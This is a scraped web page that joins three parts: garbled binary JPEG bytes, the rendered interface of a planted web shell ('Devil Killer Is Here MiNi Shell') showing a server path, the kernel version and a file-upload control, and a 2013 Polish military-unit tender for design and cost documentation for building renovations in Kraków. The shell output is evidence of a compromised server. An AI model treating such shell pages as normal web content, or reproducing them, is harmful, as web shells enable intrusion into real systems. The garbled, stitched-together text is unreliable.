JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130315/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130315/104946-N-2013.html

<p class="kh_header"><b>Kraków: Wykonanie dokumentacji projektowej i kosztorysowej oraz programu postępowania konserwatorskiego, specyfikacji technicznych oraz opisów przedmiotów zamówień dla robót budowlanych polegających na remoncie wybranych obiektów znajdujących się na terenach kompleksów wojskowych w Krakowie przy ul. Rakowickiej 29, ul. Montelupich 3, ul. Rakowickiej 22, ul. Wrocławskiej 82, ul. Tynieckiej 45, ul. Zyblikiewicza 1, ul. Ułanów 43 oraz kompleksie wojskowym w Rząsce przy ul. Krakowskiej 2, administrowanych przez Jednostkę Wojskową 
nr 3811.</b><br>
<b>Numer ogłoszenia: 104946 - 2013; data zamieszczenia: 15.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 3811 , Rząska, ul. Krakowska 2, 30-901 Kraków, woj. małopolskie, tel. +48 12 4555059; 4555116, faks +48 12 4555059, +48 12 4555103.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.35wog.mil.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej i kosztorysowej oraz programu postępowania konserwatorskiego, specyfikacji technicznych oraz opisów przedmiotów zamówień dla robót budowlanych polegających na remoncie wybranych obiektów znajdujących się na terenach kompleksów wojskowych w Krakowie przy ul. Rakowickiej 29, ul. Montelupich 3, ul. Rakowickiej 22, ul. Wrocławskiej 82, ul. Tynieckiej 45, ul. Zyblikiewicza 1, ul. Ułanów 43 oraz kompleksie wojskowym w Rząsce przy ul. Krakowskiej 2, administrowanych przez Jednostkę Wojskową 
nr 3811..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  opracowanie dokumentacji projektowych, programów prac konserwatorskich, kosztorysowych, specyfikacji technicznych oraz opisów przedmiotów zamówień dla robót budowlanych polegających na remoncie pomieszczeń w wybranych budynkach oraz sieci cieplnej znajdujących się na terenach kompleksów wojskowych administrowanych przez Jednostkę Wojskową nr 3811..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6, 71.32.00.00-7, 71.32.12.00-6, 71.32.22.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w kwocie: 

1)	dla zadania nr 1:    250 zł    (słownie złotych: dwieście pięćdziesiąt  00/100),
2)	dla zadania nr 2:    200 zł    (słownie złotych: dwieście  00/100),
3)	dla zadania nr 3:    250 zł    (słownie złotych: dwieście pięćdziesiąt  00/100).
4)	dla zadania nr 4:    350 zł    (słownie złotych: trzysta pięćdziesiąt 00/100).
5)	dla zadania nr 5:    400 zł    (słownie złotych: czterysta  00/100).
6)	dla zadania nr 6:    200 zł     (słownie złotych: dwieście  00/100),
7)	dla zadania nr 7:    500 zł     (słownie złotych: pięćset 00/100).
8)	dla zadania nr 8:    350 zł     (słownie złotych: trzysta pięćdziesiąt 00/100).
9)	dla zadania nr 9:    200  zł    (słownie złotych: dwieście  00/100),
10)	dla zadania nr 10:  200 zł   (słownie złotych: dwieście  00/100),
11)	dla zadania nr 11:  200  zł  (słownie złotych: dwieście  00/100),
12)	dla zadania nr 12:  450  zł  (słownie złotych: czterysta 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>9.1.	Posiadania uprawnień do wykonywania określonej działalności lub czynności jeżeli przepisy prawa nakładają obowiązek ich posiadania: 
9.1.1.	aktualnego na dzień składania ofert odpisu z właściwego rejestru, lub z centralnej ewidencji i informacji o działalności gospodarczej jeżeli odrębne przepisy wymagają wpisu do rejestru, lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Pzp, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>.2.1.	Zamawiający uzna, iż wykonawca spełnia powyższy warunek udziału w postępowaniu jeśli wykaże, że zrealizował lub realizuje w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,               usługi dla dwóch różnych zamawiających o zakresie podobnym do wymagań zamawiającego. Załącznik nr 8 do SIWZ. 
Do wykazu wykonanych usług Wykonawca musi dołączyć dowody (poświadczenia) potwierdzające, że usługi te zostały wykonane lub są wykonywane należycie. 
	Dla zadania nr 1: 
opracowanie co najmniej dwóch dokumentacji kosztorysowych na roboty budowlane na kwotę min. 1 000,00 zł brutto ( tysiąc złotych 00/100) - za jedno zlecenie (wykonaną usługę),
	Dla zadania nr 2: 
opracowanie co najmniej dwóch dokumentacji kosztorysowych na roboty budowlane na kwotę min. 1 000,00 zł brutto ( tysiąc złotych 00/100)  - za jedno zlecenie (wykonaną usługę),
	Dla zadania nr 3:
opracowanie co najmniej dwóch dokumentacji kosztorysowych na roboty budowlane na kwotę min. 1 000,00 zł brutto ( tysiąc złotych 00/100)  - za jedno zlecenie (wykonaną usługę),
	Dla zadania nr 4: 
opracowanie co najmniej dwóch dokumentacji projektowo-kosztorysowych na roboty budowlane dokumentacji kosztorysowych na roboty budowlane na kwotę min. 
10 000,00 zł brutto ( dziesięć tysięcy złotych 00/100)  - za jedno zlecenie (wykonaną usługę),
	Dla zadania nr 5: 
opracowanie co najmniej dwóch dokumentacji projektowo-kosztorysowych na roboty budowlane dokumentacji kosztorysowych na roboty budowlane na kwotę min. 
10 000,00 zł brutto ( dziesięć tysięcy złotych 00/100)  - za jedno zlecenie (wykonaną usługę),
	Dla zadania nr 6: 
opracowanie co najmniej dwóch dokumentacji kosztorysowych na roboty budowlane na kwotę min. 1 000,00 zł brutto ( tysiąc złotych 00/100)  - za jedno zlecenie (wykonaną usługę),
	Dla zadania nr 7: 
opracowanie co najmniej dwóch dokumentacji projektowo-kosztorysowych na roboty budowlane dokumentacji kosztorysowych na roboty budowlane na kwotę min. 
10 000,00 zł brutto ( dziesięć tysięcy złotych 00/100)  - za jedno zlecenie (wykonaną usługę),
	Dla zadania nr 8: 
opracowanie co najmniej dwóch dokumentacji projektowo-kosztorysowych na roboty budowlane dokumentacji kosztorysowych na roboty budowlane na kwotę min. 
10 000,00 zł brutto ( dziesięć tysięcy złotych 00/100)  - za jedno zlecenie (wykonaną usługę),
	Dla zadania nr 9: 
opracowanie co najmniej dwóch dokumentacji projektowo-kosztorysowych na roboty budowlane dokumentacji kosztorysowych na roboty budowlane na kwotę min. 
5 000,00 zł brutto ( pięć tysięcy złotych 00/100)  - za jedno zlecenie (wykonaną usługę),
	Dla zadania nr 10: 
opracowanie co najmniej dwóch dokumentacji projektowo-kosztorysowych na roboty budowlane dokumentacji kosztorysowych na roboty budowlane na kwotę min. 
5 000,00 zł brutto ( pięć tysięcy złotych 00/100)  - za jedno zlecenie (wykonaną usługę),
	Dla zadania nr 11: 
opracowanie co najmniej dwóch dokumentacji projektowo-kosztorysowych na roboty budowlane dokumentacji kosztorysowych na roboty budowlane na kwotę min. 
5 000,00 zł brutto ( pięć tysięcy złotych 00/100)  - za jedno zlecenie (wykonaną usługę),

	Dla zadania nr 12: 
opracowanie co najmniej dwóch dokumentacji projektowo-kosztorysowych na roboty budowlane dokumentacji kosztorysowych na roboty budowlane na kwotę min. 10 000,00 zł brutto ( dziesięć tysięcy złotych 00/100)  - za jedno zlecenie (wykonaną usługę).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla zadania nr 1: 
Wykonawca powinien wykazać, iż osoby wykonujące przedmiot zamówienia posiadają uprawnienia budowlane do projektowania w specjalności:
konstrukcyjno - budowlanej (co najmniej po jednej osobie);
instalacyjnej w zakresie sanitarnym (co najmniej po jednej osobie
instalacyjnej w zakresie elektryki (co najmniej po jednej osobie);

zgodnie rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 września 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r., nr 83, poz. 578 - z późn. zm.). Osoby o których mowa w niniejszym podpunkcie należy wykazać w załączniku nr 7 do SIWZ (Wykaz osób z uprawnieniami budowlanymi).
Ponadto Wykonawca powinien załączyć do ww. załącznika kserokopie uprawnień projektantów oraz aktualne zaświadczenia o ich przynależności do właściwej Izby Inżynierów Budownictwa i Izby Architektów.
Dla zadania nr 2: 
Wykonawca powinien wykazać, iż osoby wykonujące przedmiot zamówienia posiadają uprawnienia budowlane do projektowania w specjalności:

konstrukcyjno - budowlanej (co najmniej po jednej osobie);
instalacyjnej w zakresie sanitarnym (co najmniej po jednej osobie);
instalacyjnej w zakresie elektryki (co najmniej po jednej osobie);

zgodnie rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 września 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r., nr 83, poz. 578 - z późn. zm.). Osoby o których mowa w niniejszym podpunkcie należy wykazać 
w załączniku nr 7 do SIWZ Wykaz osób z uprawnieniami budowlanymi.
Ponadto Wykonawca powinien załączyć do ww. załącznika kserokopie uprawnień projektantów i sprawdzających oraz aktualne zaświadczenia o ich przynależności do właściwej Izby Inżynierów Budownictwa i Izby Architektów.


Dla zadania nr 3:
Wykonawca powinien wykazać, iż osoby wykonujące przedmiot zamówienia posiadają uprawnienia budowlane do projektowania w specjalności:
konstrukcyjno - budowlanej (co najmniej po jednej osobie);
instalacyjnej w zakresie sanitarnym (co najmniej po jednej osobie);
instalacyjnej w zakresie elektryki (co najmniej po jednej osobie);

zgodnie rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 września 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r., nr 83, poz. 578 - z późn. zm.). Osoby o których mowa w niniejszym podpunkcie należy wykazać 
w załączniku nr 7 do SIWZ (Wykaz osób z uprawnieniami budowlanymi).
Ponadto Wykonawca powinien załączyć do ww. załącznika kserokopie uprawnień projektantów i sprawdzających oraz aktualne zaświadczenia o ich przynależności do właściwej Izby Inżynierów Budownictwa i Izby Architektów.
Dla zadania nr 4: 
Wykonawca powinien wykazać, iż osoby wykonujące przedmiot zamówienia posiadają uprawnienia:
1)	budowlane bez ograniczeń do projektowania w specjalności:
konstrukcyjno - budowlanej (co najmniej po jednej osobie);
instalacyjnej w zakresie sanitarnym (co najmniej po jednej osobie);
instalacyjnej w zakresie elektryki (co najmniej po jednej osobie);


2)	konserwatorskie do programu prac konserwatorskich (co najmniej po jednej osobie);



zgodnie rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 września 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r., nr 83, poz. 578 - z późn. zm.). Osoby o których mowa w niniejszym podpunkcie należy wykazać 
w załączniku nr 7a do SIWZ (Wykaz osób z uprawnieniami budowlanymi i konserwatorskimi).
Ponadto Wykonawca powinien załączyć do ww. załącznika kserokopie uprawnień projektantów i sprawdzających oraz aktualne zaświadczenia o ich przynależności do właściwej Izby Inżynierów Budownictwa i Izby Architektów.
Dla zadania nr 5: 
Wykonawca powinien wykazać, iż osoby wykonujące przedmiot zamówienia posiadają uprawnienia budowlane bez ograniczeń do projektowania w specjalności:
konstrukcyjno - budowlanej (co najmniej po jednej osobie);
instalacyjnej w zakresie sanitarnym (co najmniej po jednej osobie);
instalacyjnej w zakresie elektryki (co najmniej po jednej osobie);

zgodnie rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 września 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r., nr 83, poz. 578 - z późn. zm.). Osoby o których mowa w niniejszym podpunkcie należy wykazać w załączniku nr 7 do SIWZ (Wykaz osób z uprawnieniami budowlanymi).
Ponadto Wykonawca powinien załączyć do ww. załącznika kserokopie uprawnień projektantów i sprawdzających oraz aktualne zaświadczenia o ich przynależności do właściwej Izby Inżynierów Budownictwa i Izby Architektów.
Dla zadania nr 6: 
Wykonawca powinien wykazać, iż osoby wykonujące przedmiot zamówienia posiadają uprawnienia budowlane do projektowania w specjalności:
konstrukcyjno - budowlanej (co najmniej po jednej);


zgodnie rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 września 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r., nr 83, poz. 578 - z późn. zm.). Osoby o których mowa w niniejszym podpunkcie należy wykazać 
w załączniku nr 7 do SIWZ (Wykaz osób z uprawnieniami budowlanymi).
Ponadto Wykonawca powinien załączyć do ww. załącznika kserokopie uprawnień projektantów i sprawdzających oraz aktualne zaświadczenia o ich przynależności do właściwej Izby Inżynierów Budownictwa i Izby Architektów.
Dla zadania nr 7: 
Wykonawca powinien wykazać, iż osoby wykonujące przedmiot zamówienia posiadają uprawnienia :
1)	budowlane bez ograniczeń do projektowania w specjalności:
konstrukcyjno - budowlanej (co najmniej po jednej osobie);
instalacyjnej w zakresie sanitarnym (co najmniej po jednej osobie);
instalacyjnej w zakresie elektryki (co najmniej po jednej osobie);

2)	konserwatorskie do programu prac konserwatorskich (co najmniej po jednej osobie);



zgodnie rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 września 2006 r. 
w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r., nr 83, poz. 578 - z późn. zm.). Osoby o których mowa w niniejszym podpunkcie należy wykazać 
w załączniku nr 7a do SIWZ (Wykaz osób z uprawnieniami budowlanymi 
i konserwatorskimi).
Ponadto Wykonawca powinien załączyć do ww. załącznika kserokopie uprawnień projektantów i sprawdzających oraz aktualne zaświadczenia o ich przynależności do właściwej Izby Inżynierów Budownictwa i Izby Architektów.
Dla zadania nr 8: 
Wykonawca powinien wykazać, iż osoby wykonujące przedmiot zamówienia posiadają uprawnienia budowlane bez ograniczeń do projektowania w specjalności:
konstrukcyjno - budowlanej (co najmniej po jednej osobie);
instalacyjnej w zakresie elektryki (co najmniej po jednej osobie);


zgodnie rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 września 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r., nr 83, poz. 578 - z późn. zm.). Osoby o których mowa w niniejszym podpunkcie należy wykazać 
w załączniku nr 7 do SIWZ (Wykaz osób z uprawnieniami budowlanymi).
Ponadto Wykonawca powinien załączyć do ww. załącznika kserokopie uprawnień projektantów i sprawdzających oraz aktualne zaświadczenia o ich przynależności do właściwej Izby Inżynierów Budownictwa i Izby Architektów.
Dla zadania nr 9: 
Wykonawca powinien wykazać, iż osoby wykonujące przedmiot zamówienia posiadają uprawnienia: 
1)	budowlane bez ograniczeń do projektowania w specjalności:
konstrukcyjno - budowlanej (co najmniej po jednej osobie);
instalacyjnej w zakresie sanitarnym (co najmniej po jednej osobie);
instalacyjnej w zakresie elektryki (co najmniej po jednej osobie);


2)	konserwatorskie do programu prac konserwatorskich (co najmniej po jednej osobie);



zgodnie rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 września 2006 r. 
w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r., nr 83, poz. 578 - z późn. zm.). Osoby o których mowa w niniejszym podpunkcie należy wykazać 
w załączniku nr 7a do SIWZ (Wykaz osób z uprawnieniami budowlanymi 
i konserwatorskimi).
Ponadto Wykonawca powinien załączyć do ww. załącznika kserokopie uprawnień projektantów i sprawdzających oraz aktualne zaświadczenia o ich przynależności do właściwej Izby Inżynierów Budownictwa i Izby Architektów.



Dla zadania nr 10: 
Wykonawca powinien wykazać, iż osoby wykonujące przedmiot zamówienia posiadają uprawnienia:
1)	budowlane bez ograniczeń do projektowania w specjalności:
konstrukcyjno - budowlanej (co najmniej po jednej osobie);
instalacyjnej w zakresie sanitarnym (co najmniej po jednej osobie);
instalacyjnej w zakresie elektryki (co najmniej po jednej osobie);

2)	konserwatorskie do programu prac konserwatorskich (co najmniej po jednej osobie);


zgodnie rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 września 2006 r. 
w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r., nr 83, poz. 578 - z późn. zm.). Osoby o których mowa w niniejszym podpunkcie należy wykazać 
w załączniku nr 7a do SIWZ (Wykaz osób z uprawnieniami budowlanymi i konserwatorskimi).
Ponadto Wykonawca powinien załączyć do ww. załącznika kserokopie uprawnień projektantów i sprawdzających oraz aktualne zaświadczenia o ich przynależności do właściwej Izby Inżynierów Budownictwa i Izby Architektów.
Dla zadania nr 11: 
Wykonawca powinien wykazać, iż osoby wykonujące przedmiot zamówienia posiadają uprawnienia:
1)	budowlane bez ograniczeń do projektowania w specjalności:
konstrukcyjno - budowlanej (co najmniej po jednej osobie);
instalacyjnej w zakresie sanitarnym (co najmniej po jednej osobie);
instalacyjnej w zakresie elektryki (co najmniej po jednej osobie);

2)	konserwatorskie do programu prac konserwatorskich (co najmniej po jednej osobie);



zgodnie rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 września 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r., nr 83, poz. 578 - z późn. zm.). Osoby o których mowa w niniejszym podpunkcie należy wykazać 
w załączniku nr 7a do SIWZ (Wykaz osób z uprawnieniami budowlanymi 
i konserwatorskimi).
Ponadto Wykonawca powinien załączyć do ww. załącznika kserokopie uprawnień projektantów i sprawdzających oraz aktualne zaświadczenia o ich przynależności do właściwej Izby Inżynierów Budownictwa i Izby Architektów.
Dla zadania nr 12: 
Wykonawca powinien wykazać, iż osoby wykonujące przedmiot zamówienia posiadają uprawnienia :
1)	budowlane bez ograniczeń do projektowania w specjalności:
konstrukcyjno - budowlanej (co najmniej po jednej osobie);
instalacyjnej w zakresie sanitarnym (co najmniej po jednej osobie);
instalacyjnej w zakresie elektryki (co najmniej po jednej osobie);


2)	konserwatorskie do programu prac konserwatorskich (co najmniej po jednej osobie);</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>9.5.1 Aktualne zaświadczenie właściwego dla Wykonawcy Naczelnika Urzędu Skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków  lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Zaświadczenie to ma być aktualne na dzień składania ofert.
9.5.2 Aktualne zaświadczenie właściwego dla Wykonawcy oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne  i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem składania ofert. Zaświadczenie to ma być aktualne na dzień składania ofert.
9.5.3 Zamawiający w celu oceny , czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania przedmiotu zamówienia żąda niżej wymienionych dokumentów, dotyczących sytuacji ekonomicznej i finansowej:
a)	zakresu dostępnych Wykonawcy zasobów innego podmiotu,
b)	sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, 	przy wykonywaniu zamówienia,
c)	charakteru stosunku, jaki będzie łączył Wykonawcę z innym 	podmiotem,
d)	zakresu i okresu udziału innego podmiotu przy wykonywaniu 	zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

